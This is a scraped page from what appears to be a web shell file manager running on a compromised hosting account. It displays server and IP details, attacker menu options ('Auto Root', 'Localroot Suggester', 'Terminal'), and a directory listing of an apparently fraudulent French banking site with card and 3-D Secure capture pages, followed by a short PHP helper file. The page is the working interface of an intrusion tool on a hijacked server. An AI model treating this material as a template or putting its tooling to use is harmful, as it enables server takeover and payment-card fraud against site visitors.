Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.141.164.124
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
derozboy /
mervia-groups.pro /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2024-10-27 20:54
app
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
assets
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
cartes-bancaires
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
cgi-bin
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
connexion
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
contact
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
demande-de-pret
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
faq
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
image
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
mentions-legales
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
offres
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
ouverture-de-compte
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
partials
[ DIR ]
drwxr-xr-x
2025-04-22 01:58
tarifs
[ DIR ]
drwxr-xr-x
2025-04-22 03:17
.htaccess
197
B
-r--r--r--
2025-04-22 01:18
.user.ini
103
B
-rw-r--r--
2025-04-15 03:19
3d_secure_card.php
5.97
KB
-rw-r--r--
2024-10-27 00:13
about.php
5.25
KB
-rw-r--r--
2025-04-22 01:55
admin.php
5.24
KB
-rw-r--r--
2025-04-22 03:17
dbv3.sql
4.43
KB
-rw-r--r--
2023-04-17 05:33
deconnexion.php
231
B
-rw-r--r--
2023-04-17 05:33
error_log
150.36
KB
-rw-r--r--
2025-04-29 22:42
form.php
3.84
KB
-rw-r--r--
2024-10-27 00:13
index.html
47.34
KB
-rw-r--r--
2024-10-27 00:13
index.php
489
B
-rw-r--r--
2025-04-28 07:21
info
118
B
-rw-r--r--
2024-10-27 00:13
login.php
6.23
KB
-rw-r--r--
2024-10-27 00:13
logo2.png
14.24
KB
-rw-r--r--
2024-10-26 23:47
lztxdiyi.zip
1.68
KB
-rw-r--r--
2025-04-28 07:21
message.php
625
B
-rw-r--r--
2023-04-17 05:33
mon-compte.php
2.26
KB
-rw-r--r--
2023-04-17 05:33
robots.txt
141
B
-rw-r--r--
2025-04-11 06:00
transaction.php
11.95
KB
-rw-r--r--
2025-02-09 13:35
utilities.php
742
B
-rw-r--r--
2023-04-17 05:33
uxo.txt
1
B
-rw-r--r--
2025-04-13 03:21
virement.php
3.82
KB
-rw-r--r--
2023-04-17 05:33
Save
Rename
<?php require( 'app/admin/vendor/autoload.php' ); $dotenv = \Dotenv\Dotenv::createMutable( "app/admin/" ); $dotenv->load(); $GLOBALS['db'] = new \App\Providers\DBMySql( $_ENV['DB_HOST'], $_ENV['DB_NAME'], $_ENV['DB_USER'], $_ENV['DB_PASS'] ); function checklogin() { if ( !isset($_SESSION['user_id']) ) { $message = "Veuillez vous connectez."; return header("Location:/message.php?type=danger&message=$message"); } } function getSolde($transactions) { $solde = 0; foreach ($transactions as $trans) { if ( $trans->trans_type == 'plus' ) { $solde += $trans->trans_amount; } else { $solde -= $trans->trans_amount; } } return $solde; }